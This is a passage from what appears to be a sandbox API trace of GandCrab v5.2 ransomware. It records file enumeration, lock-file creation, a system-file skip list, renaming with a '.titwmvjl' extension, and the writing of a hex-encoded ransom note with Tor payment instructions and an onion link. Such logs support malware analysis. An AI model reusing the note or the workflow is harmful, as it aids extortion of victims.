\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.351] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0070.351] CloseHandle (hObject=0x2cc) returned 1 [0070.351] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.352] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.352] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x29c)) [0070.352] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.352] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.352] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.352] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a09d2ca4deb61a.lock") returned 110 [0070.352] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\dqqhjz8c\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0070.353] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.353] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.353] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\") returned 86 [0070.353] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*" [0070.353] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503938 [0070.353] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.353] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0070.353] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.353] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.353] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0070.353] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.353] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.354] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a09d2ca4deb61a.lock" [0070.354] lstrlenW (lpString=".titwmvjl") returned 9 [0070.354] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a09d2ca4deb61a.lock") returned 110 [0070.354] VirtualAlloc (lpAddress=0x0, dwSize=0x11c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.354] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 119 [0070.354] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\d2ca4a09d2ca4deb61a.lock") returned 110 [0070.354] lstrlenW (lpString=".lock") returned 5 [0070.354] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.354] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.354] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.354] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.354] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0070.354] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.354] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.354] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\TITWMVJL-DECRYPT.txt" [0070.354] lstrlenW (lpString=".titwmvjl") returned 9 [0070.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\TITWMVJL-DECRYPT.txt") returned 106 [0070.355] VirtualAlloc (lpAddress=0x0, dwSize=0x114, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.355] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 115 [0070.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\TITWMVJL-DECRYPT.txt") returned 106 [0070.355] lstrlenW (lpString=".txt") returned 4 [0070.355] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.355] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.355] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.355] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\TITWMVJL-DECRYPT.txt") returned 106 [0070.355] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\TITWMVJL-DECRYPT.txt") returned 106 [0070.355] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.355] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.355] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.355] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.355] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.355] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.355] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.355] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.355] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.356] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0070.356] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0070.356] CloseHandle (hObject=0x2cc) returned 1 [0070.356] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.356] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0070.356] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0070.356] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\TITWMVJL-DECRYPT.txt" [0070.356] lstrlenW (lpString=".titwmvjl") returned 9 [0070.356] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\TITWMVJL-DECRYPT.txt") returned 97 [0070.356] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.356] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 106 [0070.357] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\TITWMVJL-DECRYPT.txt") returned 97 [0070.357] lstrlenW (lpString=".txt") returned 4 [0070.357] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.357] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0070.357] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0070.357] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.357] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\TITWMVJL-DECRYPT.txt") returned 97 [0070.357] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\TITWMVJL-DECRYPT.txt") returned 97 [0070.357] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0070.357] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0070.357] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0070.357] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0070.357] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0070.357] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0070.357] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0070.357] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0070.357] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.357] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0070.357] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0070.358] CloseHandle (hObject=0x2c4) returned 1 [0070.359] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.359] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.359] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.359] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a09d2ca4deb61a.lock" [0070.359] lstrlenW (lpString=".titwmvjl") returned 9 [0070.359] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a09d2ca4deb61a.lock") returned 86 [0070.359] VirtualAlloc (lpAddress=0x0, dwSize=0xec, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.359] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 95 [0070.359] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a09d2ca4deb61a.lock") returned 86 [0070.359] lstrlenW (lpString=".lock") returned 5 [0070.359] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.359] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.359] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.360] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.360] FindNextFileW (in: hFindFile=0x5034b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0070.360] lstrcmpW (lpString1="macromedia.com", lpString2=".") returned 1 [0070.360] lstrcmpW (lpString1="macromedia.com", lpString2="..") returned 1 [0070.360] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="macromedia.com" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com" [0070.360] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\" [0070.360] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.360] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.360] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.360] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.361] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.361] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.361] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.361] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.361] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.361] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\TITWMVJL-DECRYPT.txt") returned 98 [0070.361] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0070.362] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x